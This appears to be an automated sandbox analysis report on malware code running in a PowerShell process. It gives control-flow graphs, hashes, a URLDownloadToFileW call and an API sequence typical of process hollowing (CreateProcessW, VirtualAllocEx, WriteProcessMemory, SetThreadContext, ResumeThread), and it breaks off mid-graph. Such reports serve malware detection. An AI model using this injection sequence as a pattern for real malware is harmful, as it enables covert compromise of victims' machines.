                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 41aaa66e43e77ee48205bc47c3cc4f9583525770a2e99b6e78a14bba4ed006b0
                                                                                                        • Instruction ID: ac4e2a9fbe6ef0b1e5c40554c6e55a06a3002462eef4c4ef9c413f2e21ee3773
                                                                                                        • Opcode Fuzzy Hash: 41aaa66e43e77ee48205bc47c3cc4f9583525770a2e99b6e78a14bba4ed006b0
                                                                                                        • Instruction Fuzzy Hash: 69E11875A10219EFDB05CF98D884A9EFBB2FF88350F248169E904AB351C771ED91CB90
                                                                                                        Function 07904610 Relevance: 7.9, Strings: 6, Instructions: 439COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 7904610-790463b 1 7904641-7904646 0->1 2 7904af2-7904b12 0->2 3 7904648-790464e 1->3 4 790465e-7904663 1->4 10 7904b14-7904b1b 2->10 11 7904b1c-7904b25 2->11 5 7904650 3->5 6 7904652-790465c 3->6 8 7904673 4->8 9 7904665-7904671 4->9 5->4 6->4 12 7904675-7904677 8->12 9->12 10->11 14 7904b35 11->14 15 7904b27-7904b33 11->15 16 7904a93-7904a9d 12->16 17 790467d-7904687 12->17 20 7904b37-7904b39 14->20 15->20 18 7904aab-7904ab1 16->18 19 7904a9f-7904aa8 16->19 17->2 21 790468d-7904692 17->21 22 7904ab3-7904ab5 18->22 23 7904ab7-7904ac3 18->23 24 7904b7b-7904b85 20->24 25 7904b3b-7904b42 20->25 26 7904694-790469a 21->26 27 79046aa-79046b8 21->27 30 7904ac5-7904aef 22->30 23->30 28 7904b87-7904b8b 24->28 29 7904b8e-7904b94 24->29 25->24 31 7904b44-7904b61 25->31 32 790469c 26->32 33 790469e-79046a8 26->33 27->16 41 79046be-79046dd 27->41 36 7904b96-7904b98 29->36 37 7904b9a-7904ba6 29->37 43 7904b63-7904b75 31->43 44 7904bc9-7904bce 31->44 32->27 33->27 42 7904ba8-7904bc6 36->42 37->42 41->16 52 79046e3-79046ed 41->52 43->24 44->43 52->2 53 79046f3-79046f8 52->53 54 7904710-7904714 53->54 55 79046fa-7904700 53->55 54->16 56 790471a-790471e 54->56 57 7904702 55->57 58 7904704-790470e 55->58 56->16 59 7904724-7904728 56->59 57->54 58->54 59->16 61 790472e-790473e 59->61 62 7904744-790476b 61->62 63 79047c6-7904815 61->63 68 7904785-79047b3 62->68 69 790476d-7904773 62->69 80 790481c-790482f 63->80 78 79047c1-79047c4 68->78 79 79047b5-79047b7 68->79 70 7904775 69->70 71 7904777-7904783 69->71 70->68 71->68 78->80 79->78 81 7904835-790485c 80->81 82 79048b7-7904906 80->82 87 7904876-79048a4 81->87 88 790485e-7904864 81->88 99 790490d-7904920 82->99 97 79048b2-79048b5 87->97 98 79048a6-79048a8 87->98 89 7904866 88->89 90 7904868-7904874 88->90 89->87 90->87 97->99 98->97 100 7904926-790494d 99->100 101 79049a8-79049f7 99->101 106 7904967-7904995 100->106 107 790494f-7904955 100->107 118 79049fe-7904a2c 101->118 116 79049a3-79049a6 106->116 117 7904997-7904999 106->117 108 7904957 107->108 109 7904959-7904965 107->109 108->106 109->106 116->118 117->116 123 7904a2f call 32f7a08 118->123 124 7904a2f call 32f7a18 118->124 125 7904a2f call 32f7da8 118->125 126 7904a2f call 32f7c45 118->126 127 7904a2f call 32f1c00 118->127 121 7904a34-7904a90 123->121 124->121 125->121 126->121 127->121
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84i$84i$84i$84i$84i$84i
                                                                                                        • API String ID: 0-3608691829
                                                                                                        • Opcode ID: c595244ad07d6bf66147122d551266bb8b93acd964c5227510b91c2e3fcb997a
                                                                                                        • Instruction ID: c2e7dcae83f3bce533ea2f4f838a393f35482447a132ba7a3bb28623c343237f
                                                                                                        • Opcode Fuzzy Hash: c595244ad07d6bf66147122d551266bb8b93acd964c5227510b91c2e3fcb997a
                                                                                                        • Instruction Fuzzy Hash: 5AF112B4B10345AFDF149F68C400B6EBBA6EBCA714F248469EA059B390DB71DC51CBE1
                                                                                                        Function 079045F7 Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 128 79045f7-7904606 129 7904610-790463b 128->129 130 7904608-790460e 128->130 131 7904641-7904646 129->131 132 7904af2-7904b12 129->132 130->129 133 7904648-790464e 131->133 134 790465e-7904663 131->134 140 7904b14-7904b1b 132->140 141 7904b1c-7904b25 132->141 135 7904650 133->135 136 7904652-790465c 133->136 138 7904673 134->138 139 7904665-7904671 134->139 135->134 136->134 142 7904675-7904677 138->142 139->142 140->141 144 7904b35 141->144 145 7904b27-7904b33 141->145 146 7904a93-7904a9d 142->146 147 790467d-7904687 142->147 150 7904b37-7904b39 144->150 145->150 148 7904aab-7904ab1 146->148 149 7904a9f-7904aa8 146->149 147->132 151 790468d-7904692 147->151 152 7904ab3-7904ab5 148->152 153 7904ab7-7904ac3 148->153 154 7904b7b-7904b85 150->154 155 7904b3b-7904b42 150->155 156 7904694-790469a 151->156 157 79046aa-79046b8 151->157 160 7904ac5-7904aef 152->160 153->160 158 7904b87-7904b8b 154->158 159 7904b8e-7904b94 154->159 155->154 161 7904b44-7904b61 155->161 162 790469c 156->162 163 790469e-79046a8 156->163 157->146 171 79046be-79046dd 157->171 166 7904b96-7904b98 159->166 167 7904b9a-7904ba6 159->167 173 7904b63-7904b75 161->173 174 7904bc9-7904bce 161->174 162->157 163->157 172 7904ba8-7904bc6 166->172 167->172 171->146 182 79046e3-79046ed 171->182 173->154 174->173 182->132 183 79046f3-79046f8 182->183 184 7904710-7904714 183->184 185 79046fa-7904700 183->185 184->146 186 790471a-790471e 184->186 187 7904702 185->187 188 7904704-790470e 185->188 186->146 189 7904724-7904728 186->189 187->184 188->184 189->146 191 790472e-790473e 189->191 192 7904744-790476b 191->192 193 79047c6-7904815 191->193 198 7904785-79047b3 192->198 199 790476d-7904773 192->199 210 790481c-790482f 193->210 208 79047c1-79047c4 198->208 209 79047b5-79047b7 198->209 200 7904775 199->200 201 7904777-7904783 199->201 200->198 201->198 208->210 209->208 211 7904835-790485c 210->211 212 79048b7-7904906 210->212 217 7904876-79048a4 211->217 218 790485e-7904864 211->218 229 790490d-7904920 212->229 227 79048b2-79048b5 217->227 228 79048a6-79048a8 217->228 219 7904866 218->219 220 7904868-7904874 218->220 219->217 220->217 227->229 228->227 230 7904926-790494d 229->230 231 79049a8-79049f7 229->231 236 7904967-7904995 230->236 237 790494f-7904955 230->237 248 79049fe-7904a2c 231->248 246 79049a3-79049a6 236->246 247 7904997-7904999 236->247 238 7904957 237->238 239 7904959-7904965 237->239 238->236 239->236 246->248 247->246 253 7904a2f call 32f7a08 248->253 254 7904a2f call 32f7a18 248->254 255 7904a2f call 32f7da8 248->255 256 7904a2f call 32f7c45 248->256 257 7904a2f call 32f1c00 248->257 251 7904a34-7904a90 253->251 254->251 255->251 256->251 257->251
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84i$84i$84i
                                                                                                        • API String ID: 0-1595485978
                                                                                                        • Opcode ID: f301c13ed1c0176754dcd0abe933d97312b3926d1b8d3441c7d425145da16b65
                                                                                                        • Instruction ID: 93aff703fb3dcdeec8720d77a440190339be428495d691758501cc4ed706d9f0
                                                                                                        • Opcode Fuzzy Hash: f301c13ed1c0176754dcd0abe933d97312b3926d1b8d3441c7d425145da16b65
                                                                                                        • Instruction Fuzzy Hash: 4291E2B4A203459FCF18CF58C440B69B7B6EB8A714F24C469EA15AB3A0D771DC91CBD1
                                                                                                        Function 079004F8 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 258 79004f8-790050a 259 7900510-7900521 258->259 260 79005ca-79005ea 258->260 263 7900523-7900529 259->263 264 790053b-7900558 259->264 265 79005f3-79005fd 260->265 266 79005ec-79005f2 260->266 267 790052b 263->267 268 790052d-7900539 263->268 264->260 275 790055a-790057c 264->275 269 790066b-7900675 265->269 270 79005ff-790063e 265->270 266->265 267->264 268->264 272 7900680-7900686 269->272 273 7900677-790067d 269->273 289 7900640-790064e 270->289 290 79006bb-79006c0 270->290 276 7900688-790068a 272->276 277 790068c-7900698 272->277 283 7900596-79005ae 275->283 284 790057e-7900584 275->284 279 790069a-79006b8 276->279 277->279 293 79005b0-79005b2 283->293 294 79005bc-79005c7 283->294 286 7900586 284->286 287 7900588-7900594 284->287 286->283 287->283 298 7900656-7900665 289->298 290->289 293->294 298->269
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84i$84i
                                                                                                        • API String ID: 0-1526663543
                                                                                                        • Opcode ID: 0dbbd0b22126c3f30ef67246a4db79f97893bd5ce557886a1476771e956b3291
                                                                                                        • Instruction ID: 5845af16020e90d839bd8cd5d34a9506fa5e2d0cb5bb914323c4f9c6e7fa1a18
                                                                                                        • Opcode Fuzzy Hash: 0dbbd0b22126c3f30ef67246a4db79f97893bd5ce557886a1476771e956b3291
                                                                                                        • Instruction Fuzzy Hash: 535156B57103159FDB249B69981072ABBAAAFC9714F14C46AE948DF3C1CA71CC41C3E1
                                                                                                        Function 032F1C00 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 380 32f1c00-32f7e52 383 32f7e5d-32f7e63 380->383 384 32f7e54-32f7e5a 380->384 385 32f7e65-32f7e6e 383->385 386 32f7e71-32f7e7a 383->386 384->383 385->386 388 32f7e7c-32f7e83 386->388 389 32f7e84-32f7ea6 URLDownloadToFileW 386->389 388->389 390 32f7eaf-32f7ec3 389->390 391 32f7ea8-32f7eae 389->391 391->390
                                                                                                        APIs
                                                                                                        • URLDownloadToFileW.URLMON(?,00000000,00000008,?,?), ref: 032F7E99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DownloadFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 1407266417-0
                                                                                                        • Opcode ID: 38a1388611e5b239f328d8c955c4e8bfabf172c0b6345ff5a0218614e25b6abc
                                                                                                        • Instruction ID: ccde5b6ec8b62db31904e8c9fcbd49666f94cbb332afc7c4789721e58e7268c8
                                                                                                        • Opcode Fuzzy Hash: 38a1388611e5b239f328d8c955c4e8bfabf172c0b6345ff5a0218614e25b6abc
                                                                                                        • Instruction Fuzzy Hash: B521F5B1D0121A9FCB04CF9AD884ADEFBB4FB48710F14812AE918A7250D374AA54CBA0
                                                                                                        Function 07901F40 Relevance: .6, Instructions: 574COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 393 7901f40-7901f65 395 7902158-7902176 393->395 396 7901f6b-7901f70 393->396 406 7902180-79021a2 395->406 407 7902178-790217e 395->407 397 7901f72-7901f78 396->397 398 7901f88-7901f8c 396->398 402 7901f7a 397->402 403 7901f7c-7901f86 397->403 399 7901f92-7901f94 398->399 400 7902108-7902112 398->400 404 7901fa4 399->404 405 7901f96-7901fa2 399->405 408 7902120-7902126 400->408 409 7902114-790211d 400->409 402->398 403->398 411 7901fa6-7901fa8 404->411 405->411 412 7902326-790233e 406->412 413 79021a8-79021ad 406->413 407->406 414 7902128-790212a 408->414 415 790212c-7902138 408->415 411->400 416 7901fae-7901fcd 411->416 430 7902340-7902346 412->430 431 7902348-790234d 412->431 417 79021c5-79021c9 413->417 418 79021af-79021b5 413->418 419 790213a-7902155 414->419 415->419 448 7901fdd 416->448 449 7901fcf-7901fdb 416->449 422 79022d8-79022e2 417->422 423 79021cf-79021d1 417->423 420 79021b7 418->420 421 79021b9-79021c3 418->421 420->417 421->417 432 79022e4-79022ec 422->432 433 79022ef-79022f5 422->433 428 79021e1 423->428 429 79021d3-79021df 423->429 436 79021e3-79021e5 428->436 429->436 430->431 437 790234f-790236a 430->437 431->437 434 79022f7-79022f9 433->434 435 79022fb-7902307 433->435 439 7902309-7902323 434->439 435->439 436->422 442 79021eb-790220a 436->442 443 7902480-79024a6 437->443 444 7902370-7902375 437->444 481 790221a 442->481 482 790220c-7902218 442->482 460 79024a8-79024ad 443->460 461 79024af-79024b5 443->461 445 7902377-790237d 444->445 446 790238d-7902391 444->446 450 7902381-790238b 445->450 451 790237f 445->451 452 7902432-790243c 446->452 453 7902397-7902399 446->453 456 7901fdf-7901fe1 448->456 449->456 450->446 451->446 462 7902449-790244f 452->462 463 790243e-7902446 452->463 458 79023a9 453->458 459 790239b-79023a7 453->459 456->400 464 7901fe7-7901fee 456->464 467 79023ab-79023ad 458->467 459->467 460->461 469 79024e3-79024ed 461->469 470 79024b7-79024d9 461->470 471 7902451-7902453 462->471 472 7902455-7902461 462->472 464->395 473 7901ff4-7901ff9 464->473 467->452 477 79023b3-79023b5 467->477 475 79024f7-79024fd 469->475 476 79024ef-79024f4 469->476 510 79024db-79024e0 470->510 511 790252d-7902556 470->511 478 7902463-790247d 471->478 472->478 479 7902011-7902020 473->479 480 7901ffb-7902001 473->480 483 7902503-790250f 475->483 484 79024ff-7902501 475->484 485 79023b7-79023bd 477->485 486 79023cf-79023d6 477->486 479->400 500 7902026-7902044 479->500 489 7902003 480->489 490 7902005-790200f 480->490 488 790221c-790221e 481->488 482->488 497 7902511-790252a 483->497 484->497 498 79023c1-79023cd 485->498 499 79023bf 485->499 495 79023d8-79023de 486->495 496 79023ee-790242f 486->496 488->422 492 7902224-790225b 488->492 489->479 490->479 524 7902275-790227c 492->524 525 790225d-7902263 492->525 501 79023e0 495->501 502 79023e2-79023ec 495->502 498->486 499->486 500->400 521 790204a-790206f 500->521 501->496 502->496 522 7902585-79025b4 511->522 523 7902558-790257e 511->523 521->400 543 7902075-790207c 521->543 537 79025b6-79025d3 522->537 538 79025ed-79025f7 522->538 523->522 529 7902294-79022d5 524->529 530 790227e-7902284 524->530 526 7902265 525->526 527 7902267-7902273 525->527 526->524 527->524 533 7902286 530->533 534 7902288-7902292 530->534 533->529 534->529 551 79025d5-79025e7 537->551 552 790263d-7902642 537->552 540 7902600-7902606 538->540 541 79025f9-79025fd 538->541 545 7902608-790260a 540->545 546 790260c-7902618 540->546 548 79020c2-79020f5 543->548 549 790207e-7902099 543->549 550 790261a-790263a 545->550 546->550 566 79020fc-7902105 548->566 558 79020b3-79020b7 549->558 559 790209b-79020a1 549->559 551->538 552->551 563 79020be-79020c0 558->563 560 79020a3 559->560 561 79020a5-79020b1 559->561 560->558 561->558 563->566
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 439a60658da23751c609f9b8f7d80d449cccfa80c7586b83728e4a10f0289fc9
                                                                                                        • Instruction ID: 5ec56ed2c67213d97f790cceaf409e1eac0c85f8ab37e288d28ff8ec9ee844fe
                                                                                                        • Opcode Fuzzy Hash: 439a60658da23751c609f9b8f7d80d449cccfa80c7586b83728e4a10f0289fc9
                                                                                                        • Instruction Fuzzy Hash: 0F123AB17243168FDB159B68881476ABBA6BFC6219F6480BBD905CF2C1DB71CC41C7E2
                                                                                                        Function 07901F27 Relevance: .1, Instructions: 125COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 807 7901f27-7901f36 808 7901f40-7901f46 807->808 809 7901f38-7901f3e 807->809 810 7901f47-7901f65 808->810 809->808 809->810 812 7902158-7902176 810->812 813 7901f6b-7901f70 810->813 823 7902180-79021a2 812->823 824 7902178-790217e 812->824 814 7901f72-7901f78 813->814 815 7901f88-7901f8c 813->815 819 7901f7a 814->819 820 7901f7c-7901f86 814->820 816 7901f92-7901f94 815->816 817 7902108-7902112 815->817 821 7901fa4 816->821 822 7901f96-7901fa2 816->822 825 7902120-7902126 817->825 826 7902114-790211d 817->826 819->815 820->815 828 7901fa6-7901fa8 821->828 822->828 829 7902326-790233e 823->829 830 79021a8-79021ad 823->830 824->823 831 7902128-790212a 825->831 832 790212c-7902138 825->832 828->817 833 7901fae-7901fcd 828->833 847 7902340-7902346 829->847 848 7902348-790234d 829->848 834 79021c5-79021c9 830->834 835 79021af-79021b5 830->835 836 790213a-7902155 831->836 832->836 865 7901fdd 833->865 866 7901fcf-7901fdb 833->866 839 79022d8-79022e2 834->839 840 79021cf-79021d1 834->840 837 79021b7 835->837 838 79021b9-79021c3 835->838 837->834 838->834 849 79022e4-79022ec 839->849 850 79022ef-79022f5 839->850 845 79021e1 840->845 846 79021d3-79021df 840->846 853 79021e3-79021e5 845->853 846->853 847->848 854 790234f-790236a 847->854 848->854 851 79022f7-79022f9 850->851 852 79022fb-7902307 850->852 856 7902309-7902323 851->856 852->856 853->839 859 79021eb-790220a 853->859 860 7902480-79024a6 854->860 861 7902370-7902375 854->861 898 790221a 859->898 899 790220c-7902218 859->899 877 79024a8-79024ad 860->877 878 79024af-79024b5 860->878 862 7902377-790237d 861->862 863 790238d-7902391 861->863 867 7902381-790238b 862->867 868 790237f 862->868 869 7902432-790243c 863->869 870 7902397-7902399 863->870 873 7901fdf-7901fe1 865->873 866->873 867->863 868->863 879 7902449-790244f 869->879 880 790243e-7902446 869->880 875 79023a9 870->875 876 790239b-79023a7 870->876 873->817 881 7901fe7-7901fee 873->881 884 79023ab-79023ad 875->884 876->884 877->878 886 79024e3-79024ed 878->886 887 79024b7-79024d9 878->887 888 7902451-7902453 879->888 889 7902455-7902461 879->889 881->812 890 7901ff4-7901ff9 881->890 884->869 894 79023b3-79023b5 884->894 892 79024f7-79024fd 886->892 893 79024ef-79024f4 886->893 927 79024db-79024e0 887->927 928 790252d-7902556 887->928 895 7902463-790247d 888->895 889->895 896 7902011-7902020 890->896 897 7901ffb-7902001 890->897 900 7902503-790250f 892->900 901 79024ff-7902501 892->901 902 79023b7-79023bd 894->902 903 79023cf-79023d6 894->903 896->817 917 7902026-7902044 896->917 906 7902003 897->906 907 7902005-790200f 897->907 905 790221c-790221e 898->905 899->905 914 7902511-790252a 900->914 901->914 915 79023c1-79023cd 902->915 916 79023bf 902->916 912 79023d8-79023de 903->912 913 79023ee-790242f 903->913 905->839 909 7902224-790225b 905->909 906->896 907->896 941 7902275-790227c 909->941 942 790225d-7902263 909->942 918 79023e0 912->918 919 79023e2-79023ec 912->919 915->903 916->903 917->817 938 790204a-790206f 917->938 918->913 919->913 939 7902585-79025b4 928->939 940 7902558-790257e 928->940 938->817 960 7902075-790207c 938->960 954 79025b6-79025d3 939->954 955 79025ed-79025f7 939->955 940->939 946 7902294-79022d5 941->946 947 790227e-7902284 941->947 943 7902265 942->943 944 7902267-7902273 942->944 943->941 944->941 950 7902286 947->950 951 7902288-7902292 947->951 950->946 951->946 968 79025d5-79025e7 954->968 969 790263d-7902642 954->969 957 7902600-7902606 955->957 958 79025f9-79025fd 955->958 962 7902608-790260a 957->962 963 790260c-7902618 957->963 965 79020c2-79020f5 960->965 966 790207e-7902099 960->966 967 790261a-790263a 962->967 963->967 983 79020fc-7902105 965->983 975 79020b3-79020b7 966->975 976 790209b-79020a1 966->976 968->955 969->968 980 79020be-79020c0 975->980 977 79020a3 976->977 978 79020a5-79020b1 976->978 977->975 978->975 980->983
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e9a3ca698b5d0a8f4f36b9fa132726840299620c357bbe9c43c36f00699de61a
                                                                                                        • Instruction ID: 06c6ed7d056f9effacc52e09c10a53ff3003a455c8a967d0f8d01a19b251ae9c
                                                                                                        • Opcode Fuzzy Hash: e9a3ca698b5d0a8f4f36b9fa132726840299620c357bbe9c43c36f00699de61a
                                                                                                        • Instruction Fuzzy Hash: 1941E4F0A243069FCB20CF148945A7D7BBABF8625CB5980A6DA049F2D2E771D941C7E1
                                                                                                        Function 031DD01D Relevance: .0, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1543440741.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_31dd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e692be85a9e4a0a315ef9325daa58f45a860f25f830de1e7ba56fcf16b4cd861
                                                                                                        • Instruction ID: d33710d36ab3bf695a2bcd11ce1c317883f794decaefe79d086cf360a2739fd0
                                                                                                        • Opcode Fuzzy Hash: e692be85a9e4a0a315ef9325daa58f45a860f25f830de1e7ba56fcf16b4cd861
                                                                                                        • Instruction Fuzzy Hash: 6801F271404304ABE7209A25FC80B67FF9CEFCA625F18C45AEC480B282C7799841CBB2
                                                                                                        Function 031DD006 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1543440741.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_31dd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0808e2a27839a5c42e5c9452902b1ad7c602cdb0fbadb55c3b875c621af2252f
                                                                                                        • Instruction ID: a2864f945cf4674ceec2cc428ba2da3762ffc799de4ca42a66aee99a54d99088
                                                                                                        • Opcode Fuzzy Hash: 0808e2a27839a5c42e5c9452902b1ad7c602cdb0fbadb55c3b875c621af2252f
                                                                                                        • Instruction Fuzzy Hash: 98015E7240E3C09FD7128B259894B52BFA8DF97224F1D81DBD8888F1A3C2699844CB72

                                                                                                        Non-executed Functions

                                                                                                        Function 032F1D28 Relevance: .2, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e2d97e785802e53fc57a49eca2b6dd51faf596e1ea944e3972a50d51dde6cfb
                                                                                                        • Instruction ID: 6d211655e8533f6d9373b45d336dd070b08553d7194dd9929b1bd2b9864c78b4
                                                                                                        • Opcode Fuzzy Hash: 1e2d97e785802e53fc57a49eca2b6dd51faf596e1ea944e3972a50d51dde6cfb
                                                                                                        • Instruction Fuzzy Hash: 1451596600F7D26FD307AB789C6A6D4BF70AE53969B1E40C7C180CF8B3D654491AC3A6
                                                                                                        Function 032F2085 Relevance: .1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b6202b808649f9eaeadd06733d565f7505149a906c66c1745f646cbb6b5afc3a
                                                                                                        • Instruction ID: 53a6accc802618ee46ad89c5cb26bcb683526fbb34cd84abcd816bfb5b11b1f2
                                                                                                        • Opcode Fuzzy Hash: b6202b808649f9eaeadd06733d565f7505149a906c66c1745f646cbb6b5afc3a
                                                                                                        • Instruction Fuzzy Hash: FA31062500EBDA6FC317973458AA4D0BF70AD1355439E82DBC0C1CF2E7D65A4A6BC3A2

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:37
                                                                                                        Total number of Limit Nodes:3
                                                                                                        execution_graph 8968 35b7d67 8969 35b7d51 8968->8969 8971 35b7e0d 8969->8971 8973 35b8738 8969->8973 8974 35b8742 8973->8974 8975 35b7e65 8973->8975 8977 35b87b0 8974->8977 8978 35b882d 8977->8978 8986 35b8eb4 8978->8986 9001 35b72f0 8978->9001 8980 35b9095 CreateProcessW 8983 35b9109 8980->8983 8981 35b88b8 8982 35b72fc Wow64SetThreadContext 8981->8982 8981->8986 8984 35b8923 8982->8984 8985 35b8a36 VirtualAllocEx 8984->8985 8984->8986 8999 35b8da8 8984->8999 8987 35b8a83 8985->8987 8986->8980 8986->8999 8987->8986 8988 35b8ad1 VirtualAllocEx 8987->8988 8990 35b8b25 8987->8990 8988->8990 8989 35b7314 WriteProcessMemory 8991 35b8b6f 8989->8991 8990->8986 8990->8989 8990->8999 8991->8986 8992 35b8cb9 8991->8992 8991->8999 9000 35b7314 WriteProcessMemory 8991->9000 8992->8986 8993 35b7314 WriteProcessMemory 8992->8993 8994 35b8ce2 8993->8994 8994->8986 8995 35b7320 Wow64SetThreadContext 8994->8995 8994->8999 8996 35b8d57 8995->8996 8996->8986 8997 35b8d5f 8996->8997 8998 35b8d68 ResumeThread 8997->8998 8997->8999 8998->8999 8999->8975 9000->8991 9002 35b8fb0 CreateProcessW 9001->9002 9004 35b9109 9002->9004 9005 35b7e76 9006 35b7e42 9005->9006 9007 35b7e96 9006->9007 9009 35b8738 8 API calls 9006->9009 9008 35b7e65 9009->9008

                                                                                                        Executed Functions

                                                                                                        Function 035B87B0 Relevance: 6.7, APIs: 4, Instructions: 666memoryprocessthreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 35b87b0-35b8861 4 35b8f99-35b9029 0->4 5 35b8867-35b8877 0->5 11 35b902b-35b902e 4->11 12 35b9031-35b9038 4->12 8 35b8879-35b887e 5->8 9 35b8880 5->9 13 35b8882-35b8884 8->13 9->13 11->12 14 35b903a-35b9040 12->14 15 35b9043-35b9059 12->15 16 35b889b-35b88ba call 35b72f0 13->16 17 35b8886-35b8899 13->17 14->15 18 35b905b-35b9061 15->18 19 35b9064-35b9107 CreateProcessW 15->19 24 35b88bc-35b88c1 16->24 25 35b88c3 16->25 17->16 18->19 27 35b9109-35b910f 19->27 28 35b9110-35b9188 19->28 26 35b88c5-35b88c7 24->26 25->26 29 35b8f0f-35b8f22 26->29 30 35b88cd-35b88e2 26->30 27->28 47 35b919a-35b91a1 28->47 48 35b918a-35b9190 28->48 41 35b8f29-35b8f3f 29->41 36 35b8f0a 30->36 37 35b88e8-35b890c 30->37 36->29 37->41 46 35b8912-35b8925 call 35b72fc 37->46 41->4 54 35b8f41-35b8f4b 41->54 55 35b892b-35b8932 46->55 56 35b8ead-35b8eaf 46->56 51 35b91b8 47->51 52 35b91a3-35b91b2 47->52 48->47 57 35b91b9 51->57 52->51 65 35b8f4d-35b8f54 54->65 66 35b8f56-35b8f58 54->66 59 35b8938-35b8942 55->59 60 35b8e93-35b8ea6 55->60 57->57 59->41 62 35b8948-35b8965 59->62 60->56 62->36 63 35b896b-35b8985 call 35b7308 62->63 73 35b898b-35b8992 63->73 74 35b8eb4 63->74 68 35b8f5a-35b8f5e 65->68 66->68 71 35b8f60 call 35b7f84 68->71 72 35b8f65-35b8f72 68->72 71->72 85 35b8f79-35b8f96 72->85 77 35b8e79-35b8e8c 73->77 78 